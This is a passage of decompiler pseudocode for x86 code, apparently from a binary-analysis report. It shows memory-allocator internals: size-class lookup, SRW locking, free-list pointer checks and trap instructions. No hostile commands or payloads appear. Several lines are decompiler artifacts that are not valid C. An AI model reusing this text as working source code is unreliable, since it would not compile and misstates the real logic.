														if(_t969 != 0) {
															goto L215;
														} else {
															goto L291;
														}
													} else {
														_t1414[4] = _t1414[4] + 1;
														asm("adc dword [edi+0x14], 0x0");
														L215:
														_t1421 =  *(_t1414 + 0x5e + _t1025 * 8) & 0x0000ffff;
														_v132 = _t969;
														_t971 =  *_t969;
														__eflags = _t971;
														if(_t971 == 0) {
															_t1240 = 0;
															__eflags = 0;
															goto L219;
														} else {
															_t1240 = _t971;
															asm("bswap ecx");
															__eflags = _t1240 & 0x001fc000;
															if((_t1240 & 0x001fc000) == 0) {
																asm("pcmpeqd xmm0, xmm0");
																asm("movdqa [esp+0x30], xmm0");
																_t1364 =  &_v96;
																_t1060 = _t1364;
																_push(0);
																_push(_t971);
																goto L323;
															} else {
																asm("prefetcht0 [ecx]");
																L219:
																 *((char*)(_t1414 + 0x5c + _t1025 * 8)) =  *((char*)(_t1414 + 0x5c + _t1025 * 8)) - 1;
																 *(_t1414 + 0x58 + _t1025 * 8) = _t1240;
																_v104 = _t1421;
																 *_t1414 =  *_t1414 - _t1421;
																__eflags =  *_t1414;
																L220:
																_t1047 = _v124;
																__eflags = _t1047;
																_t765 = _v0;
																if(_t1047 == 0) {
																	_t1452 = _t1262;
																	_t1025 = _v120;
																	L291:
																	_t991 = _t1025 << 5;
																	_t966 = _t1452;
																	_t1421 = _t1452 + _t991 + 0x48;
																	_v128 = _t966;
																	_t967 = _t966 + 0x40;
																	_v120 = _t967;
																	__imp__TryAcquireSRWLockExclusive(_t967);
																	__eflags = _t967;
																	if(_t967 == 0) {
																		L000A8B90(_t967, _v124);
																	}
																	_t774 =  *_t1421;
																	_t1231 =  *_t774;
																	_v128 = _t1231;
																	__eflags = _t1231;
																	if(_t1231 == 0) {
																		L336:
																		_t765 = L000B87D0(_t1421, _v140, _v0, _v128, 0x4000,  &_v112); // executed
																		_v156 = _t765;
																		__eflags = _t765;
																		if(_t765 == 0) {
																			goto L354;
																		} else {
																			_t1269 = (_v136 >> 0x00000009 & 0x00000fe0) + (_v136 & 0xffe00000) - (( *((_v136 >> 0x00000009 & 0x00000fe0) + (_v136 & 0xffe00000) + 0x101e) & 0x3f) << 5);
																			_t774 = _t1269 + 0x1000;
																			__eflags =  *(_t1269 + 0x100f) & 0x00000008;
																			if(( *(_t1269 + 0x100f) & 0x00000008) != 0) {
																				_t1043 =  &(_t774[8]);
																			} else {
																				_t1043 = _t774[2] + 0xc;
																				__eflags = _t1043;
																			}
																			_t991 =  *_t1043 -  *((intOrPtr*)(_v140 + 0xc));
																			goto L315;
																		}
																	} else {
																		_t1346 = _v132;
																		_v104 = 0;
																		_t1425 =  *((intOrPtr*)(_t1346 + 0x48 + _t991 + 0xc));
																		_t991 =  *((intOrPtr*)(_t1346 + 0x48 + _t991 + 0xc)) -  *((intOrPtr*)(_t1346 + 0xc));
																		_t1364 =  *_v128;
																		__eflags = _t1364;
																		if(_t1364 == 0) {
																			__eflags = 0;
																			goto L313;
																		} else {
																			_t1262 = _t1364;
																			asm("bswap edx");
																			__eflags = (_t1262 ^ _v128) - 0x1fffff;
																			if((_t1262 ^ _v128) > 0x1fffff) {
																				goto L345;
																			} else {
																				__eflags = _t1262 & 0x001fc000;
																				if((_t1262 & 0x001fc000) == 0) {
																					goto L345;
																				} else {
																					asm("prefetcht0 [edx]");
																					L313:
																					 *_t774 = 0;
																					L314:
																					_t1058 = _t774[3] & 0xffffc001 | _t774[3] + 0x00000002 & 0x00003ffe;
																					__eflags = _t1058;
																					_t774[3] = _t1058;
																					L315:
																					_t1270 = _v140;
																					_t782 =  *((intOrPtr*)(_t1270 + 0x117c)) +  *(_t774[2] + 0xc);
																					 *((intOrPtr*)(_t1270 + 0x117c)) = _t782;
																					_t1421 = _v140;
																					_t1046 =  *((intOrPtr*)(_t1421 + 0x1180));
																					__eflags = _t1046 - _t782;
																					_t783 =  >  ? _t1046 : _t782;
																					 *((intOrPtr*)(_t1421 + 0x1180)) =  >  ? _t1046 : _t782;
																					__imp__ReleaseSRWLockExclusive(_v132);
																					_t1271 = _t1421;
																					_t765 = _v0;
																					_t1047 = _v140;
																					goto L222;
																				}
																			}
																		}
																	}
																} else {
																	_t991 = _v96 -  *((intOrPtr*)(_t1262 + 0xc));
																	__eflags = _v96 -  *((intOrPtr*)(_t1262 + 0xc));
																	L222:
																	_t1360 =  *((intOrPtr*)(_t1271 + 0x10)) + _t1047;
																	__eflags = _t765 & 0x00000002;
																	if((_t765 & 0x00000002) != 0) {
																		__eflags = _v116;
																		if(_v116 == 0) {
																			_t1421 = _t1271;
																			_t991 = _t1047;
																			_t765 = E000E11A0(_t1360, _t1360, 0, _t1047);
																		}
																	}
																	__eflags =  *((char*)(_t1271 + 6));
																	_t1262 = _v128 & 0x000000ff;
																	if( *((char*)(_t1271 + 6)) != 0) {
																		__eflags = _t1047 & 0x00000fff;
																		if((_t1047 & 0x00000fff) == 0) {
																			_t1421 = _t1047;
																			_t765 = (_t1047 & 0xffe00000) + (_t1047 >> 0x00000009 & 0x00000ff8) + 0x2000;
																		} else {
																			_t765 = _t1047 - 4;
																		}
																		 *_t765 = 1;
																	}
																	__eflags = _t1262 - 2;
																	if(_t1262 == 2) {
																		_t765 = _t1047 >> 0x15;
																		__eflags =  *((short*)(_t765 + _t765 + 0x122d24)) - 0xfffe;
																		if( *((short*)(_t765 + _t765 + 0x122d24)) == 0xfffe) {
																			_t765 = _t1047 & 0xffe00000;
																			_t1262 = 3 << (_t1047 >> 0x00000002 & 0x0000001e);
																			_t991 = _t1047 >> 0x00000005 & 0x0000fffc;
																			asm("lock or [ebx+eax+0x4000], edx");
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								} else {
									_v108 = 0;
									_t765 =  *0x1360d0 & 0x000000ff;
									_v120 = _t765;
									__eflags = _t765 & 0x00000001;
									if((_t765 & 0x00000001) != 0) {
										goto L271;
									} else {
										goto L113;
									}
								}
							} else {
								__eflags = _t991;
								if(_t991 == 0) {
									_t765 = E000BB3A0(_t1484, _t1359);
									_t1360 = 0;
								} else {
									__eflags = _t991 - 0x7fe00001;
									if(_t991 < 0x7fe00001) {
										L22:
										_v132 = _t1029;
										__eflags = _t1262 & 0x00000010;
										_t1066 =  *0x1360d0 & 0x000000ff & (_t765 & 0xffffff00 | (_t1262 & 0x00000010) == 0x00000000);
										_v108 = 0xffffffff;
										_v128 = _t1066;
										__eflags = _t1066 - 1;
										if(_t1066 == 1) {
											_t1421 = _t1262;
											_t798 = E000CC4C0( &_v108, _t1360);
											_t1466 = _t1466 + 8;
											__eflags = _t798;
											if(_t798 == 0) {
												goto L23;
											} else {
												goto L30;
											}
										} else {
											L23:
											_t1368 = (_t1360 >> 0x00000009 & 0x00000fe0) + (_t1360 & 0xffe00000) - (( *((_t1360 >> 0x00000009 & 0x00000fe0) + (_t1360 & 0xffe00000) + 0x101e) & 0x3f) << 5) + 0x1000;
											_t805 = _t1368 & 0xffe01000;
											_t999 =  *_t805;
											_t1421 = _t999 + 0x40;
											__imp__TryAcquireSRWLockExclusive(_t1421);
											__eflags = _t805;
											if(_t805 == 0) {
												L000A8B90(_t805, _t1421);
											}
											__eflags =  *(_t1368 + 0xf) & 0x00000008;
											if(( *(_t1368 + 0xf) & 0x00000008) != 0) {
												_t806 = _t1368 + 0x20;
											} else {
												_t806 =  *((intOrPtr*)(_t1368 + 8)) + 0xc;
												__eflags = _t806;
											}
											_v112 =  *_t806 -  *((intOrPtr*)(_t999 + 0xc));
											_t809 =  *((intOrPtr*)(_t1368 + 8));
											__eflags =  *((char*)(_t809 + 0x10));
											if( *((char*)(_t809 + 0x10)) == 0) {
												_t765 = L000BB760(_t999, _t1368, _a8);
												__imp__ReleaseSRWLockExclusive(_t1421);
												__eflags = _t765;
												_t991 = _a8;
												_t1360 = _a4;
												if(_t765 == 0) {
													goto L29;
												} else {
													__eflags = _v136;
													if(_v136 != 0) {
														_t765 = E000CC470(_t1360, _t1360, _t991, _a12);
													}
												}
											} else {
												__imp__ReleaseSRWLockExclusive(_t1421);
												_t991 = _a8;
												_t1360 = _a4;
												_t765 = L000BB970(_t809, _t999, _t1360, _t1368, _t991);
												__eflags = _t765;
												if(_t765 == 0) {
													L29:
													_t1072 = _v0;
													__eflags = _t1072 & 0x00000010;
													if((_t1072 & 0x00000010) != 0) {
														_t765 = _v140;
														_t1370 =  *((intOrPtr*)(_t765 + 0xc)) + _t991;
														__eflags = _t1370;
														if(_t1370 < 0) {
															goto L351;
														} else {
															_t811 =  *(_t765 + 2) & 0x000000ff;
															__eflags = _t811 - 2;
															_v124 = _t1370;
															if(_t811 == 2) {
																_t1073 = 0x20;
																__eflags = _t1370;
																if(_t1370 != 0) {
																	asm("bsr ecx, edi");
																	_t1073 = 0x3f;
																	__eflags = 0x20;
																}
																_t813 = 0x20 - _t1073;
																__eflags = ( *(0x115a44 + _t813 * 4) & _t1370) - 1;
																asm("sbb eax, 0xffffffff");
																_t1371 =  *((_t1370 >> ( *(0x115a40 - _t1073) & 0x000000ff) & 0x00000007) + _t813 * 8 + (_t1370 >> ( *(0x115a40 - _t1073) & 0x000000ff) & 0x00000007) + _t813 * 8 + 0x11580c) & 0x0000ffff;
															} else {
																__eflags = _t811 - 1;
																if(_t811 != 1) {
																	_t1336 = 0x20;
																	__eflags = _t1370;
																	if(_t1370 != 0) {
																		asm("bsr edx, edi");
																		_t1336 = 0x3f;
																		__eflags = 0x20;
																	}
																	_t941 = 0x20 - _t1336;
																	_t1209 =  *(0x115a44 + _t941 * 4) & _t1370;
																	__eflags = _t1209 - 1;
																	asm("sbb eax, 0xffffffff");
																	_t943 =  *((_t1370 >> ( *(0x115a40 - _t1336) & 0x000000ff) & 0x00000007) + _t941 * 8 + (_t1370 >> ( *(0x115a40 - _t1336) & 0x000000ff) & 0x00000007) + _t941 * 8 + 0x11580c) & 0x0000ffff;
																	_t1370 - 0x41 = _t943 - 0x76;
																	_t1371 = (_t1336 & 0xffffff00 | _t943 - 0x00000076 > 0x00000000) & (_t1209 & 0xffffff00 | _t1370 - 0x00000041 >= 0x00000000) & 0x000000ff | _t943;
																} else {
																	_t1211 = _t1370 - 0x101;
																	_t944 = _t1370;
																	__eflags = _t1211 - 0xfefe;
																	if(_t1211 <= 0xfefe) {
																		__eflags = _t1370 == 1;
																		if(_t1370 == 1) {
																			_t1218 = 0x20;
																		} else {
																			asm("bsr ecx, eax");
																			_t1218 = _t1211 ^ 0x0000001f;
																		}
																		__eflags = 1 - _t1370;
																		_t944 =  <  ? 1 <<  ~_t1218 : 0xbadbb1 >> 2;
																	}
																	_t1451 = 0x20;
																	__eflags = _t944;
																	if(_t944 != 0) {
																		asm("bsr esi, eax");
																		_t1451 = 0x3f;
																		__eflags = 0x20;
																	}
																	_t1340 = 0x20 - _t1451;
																	_t1341 = (_t944 >> ( *(0x115a40 - _t1451) & 0x000000ff) & 0x00000007) + _t1340 * 8;
																	__eflags = ( *(0x115a44 + _t1340 * 4) & _t944) - 1;
																	asm("sbb edx, 0xffffffff");
																	_t1217 =  *(_t1341 + _t1341 + 0x11580c) & 0x0000ffff;
																	_t944 - 0x41 = _t1217 - 0x76;
																	_t1371 = (_t1341 & 0xffffff00 | _t1217 - 0x00000076 > 0x00000000) & (_t944 & 0xffffff00 | _t944 - 0x00000041 >= 0x00000000) & 0x000000ff | _t1217;
																	__eflags = _t1371;
																}
															}
															_v112 = 0;
															_v108 = 0xffffffff;
															_t1262 = _v140;
															_t1001 =  *_t1262 & 0x000000ff;
															__eflags = _t1001 - 2;
															if(_t1001 == 2) {
																_t815 =  *0x123d89 & 0x000000ff;
																__eflags = _t815 & 0x00000001;
																if((_t815 & 0x00000001) != 0) {
																	L000B7BD0(_t1001, _t1484);
																	_t1262 = _v140;
																}
															}
															__eflags =  *((char*)(_t1262 + 3));
															_v136 = _t1001;
															if( *((char*)(_t1262 + 3)) == 0) {
																_t1373 = (_t1371 & 0x0000ffff) << 5;
																_t1428 = _t1262 + _t1373 + 0x48;
																_t816 = _t1262 + 0x40;
																_v128 = _t816;
																__imp__TryAcquireSRWLockExclusive(_t816);
																__eflags = _t816;
																if(_t816 == 0) {
																	L000A8B90(_t816, _v132);
																}
																_t817 =  *_t1428;
																_t1064 = _t1428;
																_t1421 =  *_t817;
																__eflags = _t1421;
																if(_t1421 != 0) {
																	goto L180;
																} else {
																	_t795 =  &_v116;
																	goto L327;
																}
															} else {
																_v128 = _t1371 & 0x0000ffff;
																_t1437 =  *( *((intOrPtr*)( *[fs:0x2c] +  *0x123e38 * 4)) + 0xa0);
																__eflags = _t1437 - 2;
																if(_t1437 < 2) {
																	_push( &_v108);
																	_push(_v128);
																	_t765 = E000B9960(_t1262);
																	goto L71;
																} else {
																	_t1437[2] = _t1437[2] + 1;
																	asm("adc dword [esi+0xc], 0x0");
																	_t1393 = _t1371 & 0x0000ffff;
																	__eflags =  *0x122d20 - _t1393;
																	if( *0x122d20 < _t1393) {
																		_t1437[0xa] = _t1437[0xa] + 1;
																		asm("adc dword [esi+0x2c], 0x0");
																		_t1437[6] = _t1437[6] + 1;
																		asm("adc dword [esi+0x1c], 0x0");
																		goto L177;
																	} else {
																		_t885 =  *(_t1437 + 0x58 + _t1393 * 8);
																		__eflags = _t885;
																		if(_t885 == 0) {
																			_t1437[8] = _t1437[8] + 1;
																			asm("adc dword [esi+0x24], 0x0");
																			_t1437[6] = _t1437[6] + 1;
																			asm("adc dword [esi+0x1c], 0x0");
																			E000A85A0(_t1437, _t1393);
																			_t885 =  *(_t1437 + 0x58 + _t1393 * 8);
																			__eflags = _t885;
																			if(_t885 != 0) {
																				goto L66;
																			} else {
																				_t1262 = _v140;
																				goto L177;
																			}
																		} else {
																			_t1437[4] = _t1437[4] + 1;
																			asm("adc dword [esi+0x14], 0x0");
																			L66:
																			_t991 =  *(_t1437 + 0x5e + _t1393 * 8) & 0x0000ffff;
																			_t1262 = _t885;
																			_t887 =  *_t885;
																			__eflags = _t887;
																			if(_t887 == 0) {
																				_t1152 = 0;
																				__eflags = 0;
																				goto L70;
																			} else {
																				_t1152 = _t887;
																				asm("bswap ecx");
																				__eflags = _t1152 & 0x001fc000;
																				if((_t1152 & 0x001fc000) == 0) {
																					goto L156;
																				} else {
																					asm("prefetcht0 [ecx]");
																					L70:
																					 *((char*)(_t1437 + 0x5c + _t1393 * 8)) =  *((char*)(_t1437 + 0x5c + _t1393 * 8)) - 1;
																					 *(_t1437 + 0x58 + _t1393 * 8) = _t1152;
																					_v108 = _t991;
																					 *_t1437 =  *_t1437 - _t991;
																					__eflags =  *_t1437;
																					_t765 = _t1262;
																					L71:
																					_t1262 = _v132;
																					__eflags = _t765;
																					_t1029 = _v0;
																					_t1360 = _a4;
																					if(_t765 == 0) {
																						_t1393 = _v120;
																						L177:
																						_t1373 = _t1393 << 5;
																						_t991 = _t1262 + _t1373 + 0x48;
																						_t883 = _t1262 + 0x40;
																						_v120 = _t883;
																						__imp__TryAcquireSRWLockExclusive(_t883);
																						__eflags = _t883;
																						if(_t883 == 0) {
																							L000A8B90(_t883, _v124);
																						}
																						_t817 =  *_t991;
																						_t1421 =  *_t817;
																						__eflags = _t1421;
																						if(_t1421 == 0) {
																							goto L326;
																						} else {
																							L180:
																							_t1281 = _v144;
																							_v116 = 0;
																							_t1002 =  *((intOrPtr*)(_t1281 + 0x48 + _t1373 + 0xc));
																							_v136 = _t1002;
																							_t991 = _t1002 -  *((intOrPtr*)(_t1281 + 0xc));
																							_v128 = _t1421;
																							_t1262 =  *_t1421;
																							__eflags = _t1262;
																							if(_t1262 == 0) {
																								_t1078 = 0;
																								__eflags = 0;
																								goto L185;
																							} else {
																								_t1078 = _t1262;
																								asm("bswap ecx");
																								__eflags = (_t1078 ^ _v128) - 0x1fffff;
																								if((_t1078 ^ _v128) > 0x1fffff) {
																									goto L270;
																								} else {
																									__eflags = _t1078 & 0x001fc000;
																									if((_t1078 & 0x001fc000) == 0) {
																										goto L270;
																									} else {
																										asm("prefetcht0 [ecx]");
																										L185:
																										_t1360 = _a4;
																										 *_t817 = _t1078;
																										_t1081 = _t817[3] & 0xffffc001 | _t817[3] + 0x00000002 & 0x00003ffe;
																										__eflags = _t1081;
																										_t817[3] = _t1081;
																										goto L186;
																									}
																								}
																							}
																						}
																					} else {
																						_t991 = _v100 -  *((intOrPtr*)(_t1262 + 0xc));
																						__eflags = _v100 -  *((intOrPtr*)(_t1262 + 0xc));
																						goto L73;
																					}
																				}
																			}
																		}
																	}
																}
															}
														}
													} else {
														L30:
														_v112 = 0;
														_t952 =  *0x1360d0 & 0x000000ff;
														_v124 = _t952;
														__eflags = _t952 & 0x00000001;
														if((_t952 & 0x00000001) != 0) {
															L157:
															_t1421 = _t1072;
															_t892 = E000CC3E0( &_v104, _t1072, _t991, _a12);
															_t1466 = _t1466 + 0x10;
															__eflags = _t892;
															if(_t892 == 0) {
																goto L31;
															} else {
																_t1029 = _t1421;
																_t1421 = _v104;
																goto L159;
															}
														} else {
															L31:
															_t765 = _v132;
															_t1155 =  *((intOrPtr*)(_t765 + 0xc)) + _t991;
															__eflags = _t1155;
															if(_t1155 < 0) {
																asm("int3");
																asm("ud2");
																L351:
																asm("int3");
																asm("ud2");
																goto L352;
															} else {
																_t1016 = _t1155;
																_t893 =  *(_t765 + 2) & 0x000000ff;
																__eflags = _t893 - 2;
																_v124 = _t1155;
																if(_t893 == 2) {
																	_t1156 = 0x20;
																	__eflags = _t1016;
																	if(_t1016 != 0) {
																		asm("bsr ecx, ebx");
																		_t1156 = 0x3f;
																		__eflags = 0x20;
																	}
																	_t895 = 0x20 - _t1156;
																	__eflags = ( *(0x115a44 + _t895 * 4) & _t1016) - 1;
																	asm("sbb eax, 0xffffffff");
																	_v128 =  *((_t1016 >> ( *(0x115a40 - _t1156) & 0x000000ff) & 0x00000007) + _t895 * 8 + (_t1016 >> ( *(0x115a40 - _t1156) & 0x000000ff) & 0x00000007) + _t895 * 8 + 0x11580c) & 0x0000ffff;
																} else {
																	__eflags = _t893 - 1;
																	if(_t893 != 1) {
																		_t1326 = 0x20;
																		__eflags = _t1016;
																		if(_t1016 != 0) {
																			asm("bsr edx, ebx");
																			_t1326 = 0x3f;
																			__eflags = 0x20;
																		}
																		_t926 = 0x20 - _t1326;
																		_t1192 =  *(0x115a44 + _t926 * 4) & _t1016;
																		__eflags = _t1192 - 1;
																		asm("sbb eax, 0xffffffff");
																		_t928 =  *((_t1016 >> ( *(0x115a40 - _t1326) & 0x000000ff) & 0x00000007) + _t926 * 8 + (_t1016 >> ( *(0x115a40 - _t1326) & 0x000000ff) & 0x00000007) + _t926 * 8 + 0x11580c) & 0x0000ffff;
																		_t1016 - 0x41 = _t928 - 0x76;
																		_v128 = (_t1326 & 0xffffff00 | _t928 - 0x00000076 > 0x00000000) & (_t1192 & 0xffffff00 | _t1016 - 0x00000041 >= 0x00000000) & 0x000000ff | _t928;
																	} else {
																		_t1196 = _t1016 - 0x101;
																		_t929 = _t1016;
																		__eflags = _t1196 - 0xfefe;
																		if(_t1196 <= 0xfefe) {
																			__eflags = _t1016 == 1;
																			if(_t1016 == 1) {
																				_t1203 = 0x20;
																			} else {
																				asm("bsr ecx, eax");
																				_t1203 = _t1196 ^ 0x0000001f;
																			}
																			__eflags = 1 - _t1016;
																			_t929 =  <  ? 1 <<  ~_t1203 : 0xbadbb1 >> 2;
																		}
																		_t1024 = _t1403;
																		_t1447 = 0x20;
																		__eflags = _t929;
																		if(_t929 != 0) {
																			asm("bsr esi, eax");
																			_t1447 = 0x3f;
																			__eflags = 0x20;
																		}
																		_t1330 = 0x20 - _t1447;
																		_t1331 = (_t929 >> ( *(0x115a40 - _t1447) & 0x000000ff) & 0x00000007) + _t1330 * 8;
																		__eflags = ( *(0x115a44 + _t1330 * 4) & _t929) - 1;
																		asm("sbb edx, 0xffffffff");
																		_t1202 =  *(_t1331 + _t1331 + 0x11580c) & 0x0000ffff;
																		_t929 - 0x41 = _t1202 - 0x76;
																		_t932 = (_t1331 & 0xffffff00 | _t1202 - 0x00000076 > 0x00000000) & (_t929 & 0xffffff00 | _t929 - 0x00000041 >= 0x00000000) & 0x000000ff | _t1202;
																		__eflags = _t932;
																		_v128 = _t932;
																		_t1360 = _t1024;
																	}
																}
																_v93 = 0;
																_v100 = 0xffffffff;
																_t1262 = _v132;
																_t1017 =  *_t1262 & 0x000000ff;
																__eflags = _t1017 - 2;
																if(_t1017 == 2) {
																	_t898 =  *0x123d89 & 0x000000ff;
																	__eflags = _t898 & 0x00000001;
																	if((_t898 & 0x00000001) != 0) {
																		L000B7BD0(_t1017, _t1484);
																		_t1262 = _v132;
																	}
																}
																__eflags =  *((char*)(_t1262 + 3));
																_v120 = _t1017;
																if( *((char*)(_t1262 + 3)) == 0) {
																	_t1395 = (_v128 & 0x0000ffff) << 5;
																	_t1440 = _t1262 + _t1395 + 0x48;
																	_t899 = _t1262 + 0x40;
																	_v112 = _t899;
																	__imp__TryAcquireSRWLockExclusive(_t899);
																	__eflags = _t899;
																	if(_t899 == 0) {
																		L000A8B90(_t899, _v116);
																	}
																	_t900 =  *_t1440;
																	_t1160 = _t1440;
																	_t1421 =  *_t900;
																	__eflags = _t1421;
																	if(_t1421 != 0) {
																		goto L193;
																	} else {
																		_t909 =  &_v97;
																		goto L332;
																	}
																} else {
																	_t1443 =  *( *((intOrPtr*)( *[fs:0x2c] +  *0x123e38 * 4)) + 0xa0);
																	__eflags = _t1443 - 2;
																	if(_t1443 < 2) {
																		_push( &_v100);
																		_push(_v128 & 0x0000ffff);
																		_t765 = E000B9960(_v132);
																		goto L98;
																	} else {
																		_t1443[2] = _t1443[2] + 1;
																		asm("adc dword [esi+0xc], 0x0");
																		_t921 = _v128;
																		_t1403 = _t921 & 0x0000ffff;
																		__eflags =  *0x122d20 - _t921;
																		if( *0x122d20 < _t921) {
																			_t1443[0xa] = _t1443[0xa] + 1;
																			asm("adc dword [esi+0x2c], 0x0");
																			_t1443[6] = _t1443[6] + 1;
																			asm("adc dword [esi+0x1c], 0x0");
																			goto L190;
																		} else {
																			_t922 =  *(_t1443 + 0x58 + _t1403 * 8);
																			__eflags = _t922;
																			if(_t922 == 0) {
																				_t1443[8] = _t1443[8] + 1;
																				asm("adc dword [esi+0x24], 0x0");
																				_t1443[6] = _t1443[6] + 1;
																				asm("adc dword [esi+0x1c], 0x0");
																				E000A85A0(_t1443, _t1403);
																				_t922 =  *(_t1443 + 0x58 + _t1403 * 8);
																				__eflags = _t922;
																				if(_t922 != 0) {
																					goto L93;
																				} else {
																					_t1262 = _v132;
																					goto L190;
																				}
																			} else {
																				_t1443[4] = _t1443[4] + 1;
																				asm("adc dword [esi+0x14], 0x0");
																				L93:
																				_t991 =  *(_t1443 + 0x5e + _t1403 * 8) & 0x0000ffff;
																				_t1262 = _t922;
																				_t887 =  *_t922;
																				__eflags = _t887;
																				if(_t887 == 0) {
																					_t1187 = 0;
																					__eflags = 0;
																					goto L97;
																				} else {
																					_t1187 = _t887;
																					asm("bswap ecx");
																					__eflags = _t1187 & 0x001fc000;
																					if((_t1187 & 0x001fc000) == 0) {
																						L156:
																						asm("pcmpeqd xmm0, xmm0");
																						asm("movdqa [esp+0x30], xmm0");
																						_t1438 =  &_v100;
																						_t888 = L000A88D0(_t1438, 0x115ac8, _t887, 0);
																						_push(_t1438);
																						E00070790(_t888);
																						_t1466 = _t1466 + 4;
																						_t1072 = _t991;
																						L000A8960(_t1072, _t1484);
																						goto L157;
																					} else {
																						asm("prefetcht0 [ecx]");
																						L97:
																						 *((char*)(_t1443 + 0x5c + _t1403 * 8)) =  *((char*)(_t1443 + 0x5c + _t1403 * 8)) - 1;
																						 *(_t1443 + 0x58 + _t1403 * 8) = _t1187;
																						_v100 = _t991;
																						 *_t1443 =  *_t1443 - _t991;
																						__eflags =  *_t1443;
																						_t1360 = _a4;
																						_t765 = _t1262;
																						L98:
																						_t1262 = _v124;
																						__eflags = _t765;
																						_t1029 = _v0;
																						if(_t765 == 0) {
																							_t1403 = _v120 & 0x0000ffff;
																							L190:
																							_t1395 = _t1403 << 5;
																							_t1022 = _t1262 + _t1395 + 0x48;
																							_t919 = _t1262 + 0x40;
																							_v104 = _t919;
																							__imp__TryAcquireSRWLockExclusive(_t919);
																							__eflags = _t919;
																							if(_t919 == 0) {
																								L000A8B90(_t919, _v108);
																							}
																							_t900 =  *_t1022;
																							_t1421 =  *_t900;
																							__eflags = _t1421;
																							if(_t1421 == 0) {
																								_t909 =  &_v89;
																								_t1160 = _t1022;
																								L332:
																								_t765 = L000B87D0(_t1160, _v136, _v0, _v128, 0x4000, _t909);
																								_v152 = _t765;
																								__eflags = _t765;
																								if(_t765 == 0) {
																									__imp__ReleaseSRWLockExclusive(_v116);
																									_t1421 = 0;
																									_t1029 = _v0;
																									_t991 = _a8;
																									goto L171;
																								} else {
																									_t1324 = (_v132 >> 0x00000009 & 0x00000fe0) + (_v132 & 0xffe00000) - (( *((_v132 >> 0x00000009 & 0x00000fe0) + (_v132 & 0xffe00000) + 0x101e) & 0x3f) << 5);
																									_t900 = _t1324 + 0x1000;
																									__eflags =  *(_t1324 + 0x100f) & 0x00000008;
																									if(( *(_t1324 + 0x100f) & 0x00000008) != 0) {
																										_t1179 =  &(_t900[8]);
																									} else {
																										_t1179 = _t900[2] + 0xc;
																										__eflags = _t1179;
																									}
																									_t991 =  *_t1179 -  *((intOrPtr*)(_v136 + 0xc));
																									_t1360 = _a4;
																									goto L199;
																								}
																							} else {
																								L193:
																								_t1318 = _v136;
																								_v97 = 0;
																								_t1018 =  *(_t1318 + 0x48 + _t1395 + 0xc);
																								_v128 = _t1018;
																								_t991 = _t1018 -  *((intOrPtr*)(_t1318 + 0xc));
																								_v132 = _t1421;
																								_t1262 =  *_t1421;
																								__eflags = _t1262;
																								if(_t1262 == 0) {
																									_t1162 = 0;
																									__eflags = 0;
																									goto L198;
																								} else {
																									_t1162 = _t1262;
																									asm("bswap ecx");
																									__eflags = (_t1162 ^ _v132) - 0x1fffff;
																									if((_t1162 ^ _v132) > 0x1fffff) {
																										L270:
																										asm("pcmpeqd xmm0, xmm0");
																										asm("movdqa [esp+0x30], xmm0");
																										_t1376 =  &_v104;
																										_t830 = L000A88D0(_t1376, 0x115ac8, _t1262, 0);
																										_push(_t1376);
																										E00070790(_t830);
																										_t1466 = _t1466 + 4;
																										_t1029 = _v148;
																										L000A8960(_t1029, _t1484);
																										L271:
																										_t1421 = _t1029;
																										_t765 = E000CC3E0( &_v108, _t1262, _t991, _t1029);
																										_t1466 = _t1466 + 0x10;
																										__eflags = _t765;
																										if(_t765 == 0) {
																											L113:
																											__eflags = _t991;
																											if(_t991 == 0) {
																												_t1377 = 1;
																											} else {
																												_t1377 = _t991;
																											}
																											_t1378 = _t1377 +  *((intOrPtr*)(_t1029 + 0xc));
																											__eflags = _t1378 - _t991;
																											if(_t1378 < _t991) {
																												L352:
																												asm("int3");
																												asm("ud2");
																												L353:
																												asm("int3");
																												asm("ud2");
																												L354:
																												__imp__ReleaseSRWLockExclusive(_v128);
																												_t1360 = 0;
																											} else {
																												_t834 =  *(_t1029 + 2) & 0x000000ff;
																												__eflags = _t834 - 2;
																												_v128 = _t1378;
																												_t1004 = _t1029;
																												if(_t834 == 2) {
																													_t1092 = 0x20;
																													__eflags = _t1378;
																													if(_t1378 != 0) {
																														asm("bsr ecx, edi");
																														_t1092 = 0x3f;
																														__eflags = 0x20;
																													}
																													_t836 = 0x20 - _t1092;
																													__eflags = ( *(0x115a44 + _t836 * 4) & _t1378) - 1;
																													asm("sbb eax, 0xffffffff");
																													_t1379 =  *((_t1378 >> ( *(0x115a40 - _t1092) & 0x000000ff) & 0x00000007) + _t836 * 8 + (_t1378 >> ( *(0x115a40 - _t1092) & 0x000000ff) & 0x00000007) + _t836 * 8 + 0x11580c) & 0x0000ffff;
																												} else {
																													__eflags = _t834 - 1;
																													if(_t834 != 1) {
																														_t1303 = 0x20;
																														__eflags = _t1378;
																														if(_t1378 != 0) {
																															asm("bsr edx, edi");
																															_t1303 = 0x3f;
																															__eflags = 0x20;
																														}
																														_t867 = 0x20 - _t1303;
																														_t1136 =  *(0x115a44 + _t867 * 4) & _t1378;
																														__eflags = _t1136 - 1;
																														asm("sbb eax, 0xffffffff");
																														_t869 =  *((_t1378 >> ( *(0x115a40 - _t1303) & 0x000000ff) & 0x00000007) + _t867 * 8 + (_t1378 >> ( *(0x115a40 - _t1303) & 0x000000ff) & 0x00000007) + _t867 * 8 + 0x11580c) & 0x0000ffff;
																														_t1378 - 0x41 = _t869 - 0x76;
																														_t1379 = (_t1303 & 0xffffff00 | _t869 - 0x00000076 > 0x00000000) & (_t1136 & 0xffffff00 | _t1378 - 0x00000041 >= 0x00000000) & 0x000000ff | _t869;
																													} else {
																														_t1138 = _t1378 - 0x101;
																														_t870 = _t1378;
																														__eflags = _t1138 - 0xfefe;
																														if(_t1138 <= 0xfefe) {
																															__eflags = _t1378 == 1;
																															if(_t1378 == 1) {
																																_t1145 = 0x20;
																															} else {
																																asm("bsr ecx, eax");
																																_t1145 = _t1138 ^ 0x0000001f;
																															}
																															__eflags = 1 - _v128;
																															_t870 =  <  ? 1 <<  ~_t1145 : 0xbadbb1 >> 2;
																														}
																														_t1436 = 0x20;
																														__eflags = _t870;
																														if(_t870 != 0) {
																															asm("bsr esi, eax");
																															_t1436 = 0x3f;
																															__eflags = 0x20;
																														}
																														_t1307 = 0x20 - _t1436;
																														_t1308 = (_t870 >> ( *(0x115a40 - _t1436) & 0x000000ff) & 0x00000007) + _t1307 * 8;
																														__eflags = ( *(0x115a44 + _t1307 * 4) & _t870) - 1;
																														asm("sbb edx, 0xffffffff");
